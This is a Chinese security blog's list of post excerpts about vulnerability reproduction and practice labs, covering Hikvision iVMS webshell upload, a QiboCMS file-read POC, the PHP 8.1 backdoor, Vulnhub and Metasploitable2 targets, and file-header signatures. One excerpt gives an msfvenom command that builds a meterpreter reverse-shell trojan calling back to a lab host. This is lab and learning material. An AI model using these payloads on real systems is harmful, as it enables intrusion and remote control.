- 博客(13)
- 收藏
- 关注
原创 海康威视iVMS系统在野 0day漏洞复现
简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
2023-05-26 11:09:12
2610
3
原创 常见文件头标志
PE(exe,dll)文件头:4D5AJPEG (jpg),文件头:FFD8FFPNG (png),文件头:89504E47GIF (gif),文件头:47494638TIFF (tif),文件头:49492A00Windows Bitmap (bmp),文件头:424DCAD (dwg),文件头:41433130Adobe Photoshop (psd),文件头:38425053Rich Text Format (rtf),文件头:7B5C727466XML (xml),文件头:3C3F
2022-10-11 11:38:40
1483
原创 齐博CMSV7任意文件读取漏洞批量测试POC
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。# -*- coding:utf-8 -*-import requestsimport reimport urllibimport base64def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():
2022-04-22 15:20:20
1505
1
原创 vulhub 8.1-backdoor漏洞复现
漏洞描述PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。漏洞危害攻击者可以通过user-agent来执行恶意代码获取重要信息。漏洞等级高危 ★★★★影响范围PHP 8.1.0-dev加固方法建议参考官方公告及时升级或安装相应补丁。参考链接:https://news-web.php.net/php.internals/113838https://github.co
2022-02-28 16:40:09
4072
原创 Vulnhub之Breach1.0靶场练习
靶机信息下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip环境配置1.解压后用vmware打开,这里是我已经安装好的,未安装的只有ova和readme.txt两个文件Pasted image 20220221090234.png2.靶机默认使用仅主机模式,ip为192.168.110.140,所以需要将vmnet1的ip设置在192.168.110.0此网段。Pasted image 20220221090526.pngPasted
2022-02-22 09:15:41
3974
原创 ZVulDrill安装及通关教程
一、安装1、首先下载一下该安装包下载链接:https://github.com/710leo/ZVulDrill2、下载一个phpstudy下载链接:https://www.xp.cn/download.html根据自己得个人下载一个适合得版本,默认是下载到d盘注:phpstudy为一个集成得环境非常得方便,包含了apache、mysql等环境,包括pikachu等都可以用phpstudy来搭建3、将下载好的压缩包解压至phpstudy下面得www目录下面4、修改文件密码修改一下sys目录
2021-10-27 16:32:37
6198
4
原创 Metasploitable2靶机学习
Metasploitable2靶机渗透什么是Metasploitable2?Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。使用步骤下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download默认用户名密码都为:msfadmin下载下来后直接双击网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网
2021-10-13 11:52:20
4378
原创 记kali下使用metasploit木马进行远程控制
环境:ubuntun+kali2020.4本次实验需要两台虚拟机kali及ubuntun注:kali地址为192.168.147.137 ubuntun的地址为192.168.147.129本人使用ssh链接ssh链接ubuntun 并进入root权限ssh链接kali在kali下root权限下生成payload(也就是木马)msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -
2021-05-11 11:18:33
1139
原创 解决centos7搭建docker环境下../upload文件夹不存在,请手工创建!问题
当发现docker环境搭建的upload出现该问题后的处置方法1、首先进入到docker中,如果不知道自己的docker在哪里可以用docker ps查看所有在运行的容器信息,找到其ID使用docker inspect + id 查看docker位置发现到var/lib下面 进入到docker环境中使用docker exec -it $(docker ps -q) /bin/bash进入到www目录下,使用ls命令可以看到没有upload文件夹使用mkdir upload命令创建文件夹然
2021-05-03 18:22:57
1180
4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人